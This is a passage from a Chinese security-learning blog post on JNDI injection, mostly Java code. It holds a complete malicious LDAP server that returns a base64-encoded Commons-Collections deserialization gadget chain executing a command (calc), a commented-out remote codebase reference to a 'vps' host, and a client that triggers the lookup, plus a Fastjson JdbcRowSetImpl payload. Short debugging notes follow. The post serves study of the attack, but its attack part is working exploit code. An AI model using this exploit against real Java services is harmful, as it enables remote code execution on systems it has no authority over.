class="hljs-keyword">import</span> com.unboundid.ldap.listener.InMemoryDirectoryServer;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.listener.InMemoryListenerConfig;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.sdk.Entry;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.sdk.LDAPException;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.sdk.LDAPResult;<br><span class="hljs-keyword">import</span> com.unboundid.ldap.sdk.ResultCode;<br><br><span class="hljs-keyword">import</span> javax.net.ServerSocketFactory;<br><span class="hljs-keyword">import</span> javax.net.SocketFactory;<br><span class="hljs-keyword">import</span> javax.net.ssl.SSLSocketFactory;<br><span class="hljs-keyword">import</span> java.net.InetAddress;<br><span class="hljs-keyword">import</span> java.net.MalformedURLException;<br><span class="hljs-keyword">import</span> java.net.URL;<br><span class="hljs-keyword">import</span> java.text.ParseException;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">JNDILDAP_bypass</span> &#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">String</span> <span class="hljs-variable">LDAP_BASE</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;dc=example,dc=com&quot;</span>;<br><br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span> <span class="hljs-params">(String[] args)</span> &#123;<br><br>        <span class="hljs-type">String</span> <span class="hljs-variable">url</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;http://vps:8000/#ExportObject&quot;</span>;<br>        <span class="hljs-type">int</span> <span class="hljs-variable">port</span> <span class="hljs-operator">=</span> <span class="hljs-number">7000</span>;<br><br><br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-type">InMemoryDirectoryServerConfig</span> <span class="hljs-variable">config</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">InMemoryDirectoryServerConfig</span>(LDAP_BASE);<br>            config.setListenerConfigs(<span class="hljs-keyword">new</span> <span class="hljs-title class_">InMemoryListenerConfig</span>(<br>                    <span class="hljs-string">&quot;listen&quot;</span>,<br>                    InetAddress.getByName(<span class="hljs-string">&quot;0.0.0.0&quot;</span>),<br>                    port,<br>                    ServerSocketFactory.getDefault(),<br>                    SocketFactory.getDefault(),<br>                    (SSLSocketFactory) SSLSocketFactory.getDefault()));<br><br>            config.addInMemoryOperationInterceptor(<span class="hljs-keyword">new</span> <span class="hljs-title class_">OperationInterceptor</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(url)));<br>            <span class="hljs-type">InMemoryDirectoryServer</span> <span class="hljs-variable">ds</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">InMemoryDirectoryServer</span>(config);<br>            System.out.println(<span class="hljs-string">&quot;Listening on 0.0.0.0:&quot;</span> + port);<br>            ds.startListening();<br><br>        &#125;<br>        <span class="hljs-keyword">catch</span> ( Exception e ) &#123;<br>            e.printStackTrace();<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">OperationInterceptor</span> <span class="hljs-keyword">extends</span> <span class="hljs-title class_">InMemoryOperationInterceptor</span> &#123;<br><br>        <span class="hljs-keyword">private</span> URL codebase;<br><br><br>        <span class="hljs-comment">/**</span><br><span class="hljs-comment">         * */</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_">OperationInterceptor</span> <span class="hljs-params">( URL cb )</span> &#123;<br>            <span class="hljs-built_in">this</span>.codebase = cb;<br>        &#125;<br><br><br>        <span class="hljs-comment">/**</span><br><span class="hljs-comment">         * &#123;<span class="hljs-doctag">@inheritDoc</span>&#125;</span><br><span class="hljs-comment">         * * <span class="hljs-doctag">@see</span> com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)</span><br><span class="hljs-comment">         */</span> <span class="hljs-meta">@Override</span><br>        <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">processSearchResult</span> <span class="hljs-params">( InMemoryInterceptedSearchResult result )</span> &#123;<br>            <span class="hljs-type">String</span> <span class="hljs-variable">base</span> <span class="hljs-operator">=</span> result.getRequest().getBaseDN();<br>            <span class="hljs-type">Entry</span> <span class="hljs-variable">e</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Entry</span>(base);<br>            <span class="hljs-keyword">try</span> &#123;<br>                sendResult(result, base, e);<br>            &#125;<br>            <span class="hljs-keyword">catch</span> ( Exception e1 ) &#123;<br>                e1.printStackTrace();<br>            &#125;<br><br>        &#125;<br><br><br>        <span class="hljs-keyword">protected</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">sendResult</span> <span class="hljs-params">( InMemoryInterceptedSearchResult result, String base, Entry e )</span> <span class="hljs-keyword">throws</span> LDAPException, MalformedURLException &#123;<br>            <span class="hljs-type">URL</span> <span class="hljs-variable">turl</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(<span class="hljs-built_in">this</span>.codebase, <span class="hljs-built_in">this</span>.codebase.getRef().replace(<span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-string">&#x27;/&#x27;</span>).concat(<span class="hljs-string">&quot;.class&quot;</span>));<br>            System.out.println(<span class="hljs-string">&quot;Send LDAP reference result for &quot;</span> + base + <span class="hljs-string">&quot; redirecting to &quot;</span> + turl);<br>            e.addAttribute(<span class="hljs-string">&quot;javaClassName&quot;</span>, <span class="hljs-string">&quot;Exploit&quot;</span>);<br>            <span class="hljs-type">String</span> <span class="hljs-variable">cbstring</span> <span class="hljs-operator">=</span> <span class="hljs-built_in">this</span>.codebase.toString();<br>            <span class="hljs-type">int</span> <span class="hljs-variable">refPos</span> <span class="hljs-operator">=</span> cbstring.indexOf(<span class="hljs-string">&#x27;#&#x27;</span>);<br>            <span class="hljs-keyword">if</span> ( refPos &gt; <span class="hljs-number">0</span> ) &#123;<br>                cbstring = cbstring.substring(<span class="hljs-number">0</span>, refPos);<br>            &#125;<br><br>            <span class="hljs-comment">// Payload1: 利用LDAP+Reference Factory</span><br><span class="hljs-comment">//            e.addAttribute(&quot;javaCodeBase&quot;, cbstring);</span><br><span class="hljs-comment">//            e.addAttribute(&quot;objectClass&quot;, &quot;javaNamingReference&quot;);</span><br><span class="hljs-comment">//            e.addAttribute(&quot;javaFactory&quot;, this.codebase.getRef());</span><br><br>            <span class="hljs-comment">// Payload2: 返回序列化Gadget</span><br>            <span class="hljs-keyword">try</span> &#123;<br>                e.addAttribute(<span class="hljs-string">&quot;javaSerializedData&quot;</span>, Base64.decode(<span class="hljs-string">&quot;rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AARjYWxjdAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=&quot;</span>));<br>            &#125; <span class="hljs-keyword">catch</span> (ParseException exception) &#123;<br>                exception.printStackTrace();<br>            &#125;<br><br>            result.sendSearchEntry(e);<br>            result.setResult(<span class="hljs-keyword">new</span> <span class="hljs-title class_">LDAPResult</span>(<span class="hljs-number">0</span>, ResultCode.SUCCESS));<br>        &#125;<br><br>    &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p>客户端：先用 lookup 攻击，后续再学习 Fastjson</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs plain">package JNDI_RMI_Injection;<br><br>import com.alibaba.fastjson.JSON;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br><br>public class JNDILDAPClient_bypass &#123;<br>    public static void main(String[] args) throws Exception &#123;<br>        // lookup参数注入触发<br>        Context context = new InitialContext();<br>        context.lookup(&quot;ldap://localhost:7000/ExportObject&quot;);<br><br>       /* // Fastjson反序列化JNDI注入Gadget触发<br>        String payload =&quot;&#123;\&quot;@type\&quot;:\&quot;com.sun.rowset.JdbcRowSetImpl\&quot;,\&quot;dataSourceName\&quot;:\&quot;ldap://127.0.0.1:1234/ExportObject\&quot;,\&quot;autoCommit\&quot;:\&quot;true\&quot; &#125;&quot;;<br>        JSON.parse(payload);*/<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760584437987-3f3b9734-a845-49d3-b6f0-510afe345384.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h3><p>自己先试着调。</p>
<p>一如既往地 lookup 下断点，先是进入 Ldap 对应的上下文 LdapCtx.lookup</p>
<p>ClassName 属性值存在进入 decodeObject,</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760585829309-d90720cc-d3e0-4191-8285-1105f557054f.png" srcset="/img/loading.gif" lazyload></p>
<p>这里条件 javaSerializedData 属性值不为空也是满足的，进入 deserializeObject</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760586156819-267e6c5f-ec84-45dd-a564-6b22717c8dd1.png" srcset="/img/loading.gif" lazyload></p>
<p>readObejct 反序列化</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760586104945-c8ff935b-9a01-4abe-9d81-ae41dcaee96d.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="五-总结"><a href="#五-总结" class="headerlink" title="五. 总结"></a>五. 总结</h1><p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760597349627-2c317030-83ce-465a-8d14-b305da0f90fd.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Java/" class="category-chain-item">Java</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/JNDI/" class="print-no-link">#JNDI</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>JNDI</div>
      <div>https://bxhhf.github.io/2025/10/13/yuque-hexo-post/JNDI/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>bxhhf</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/23/yuque-hexo-post/Fastjson%E5%9F%BA%E7%A1%80/" title="Fastjson基础">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Fastjson基础</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/09/23/yuque-hexo-post/JEP290%20Bypass/" title="JEP290 Bypass">
                        <span class="hidden-mobile">JEP290 Bypass</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"AN6AZUYA9oJo0TesuVqbgX1I-gzGzoHsz","appKey":"gbgqDB024hr2I7jmwbO6Mz2a","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/cdn.jsdelivr.net/gh/bynotes/texiao/source/js/xiaoxuehua.js"></script>
<script src="/js/background.js"></script>
<script src="/js/scrollAnimation.js"></script>
<script src="/js/sign.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
  <!-- 雪花特效 -->
  <script type="text/javascript" src="\js\snow.js"></script>
  
</body>
</html>
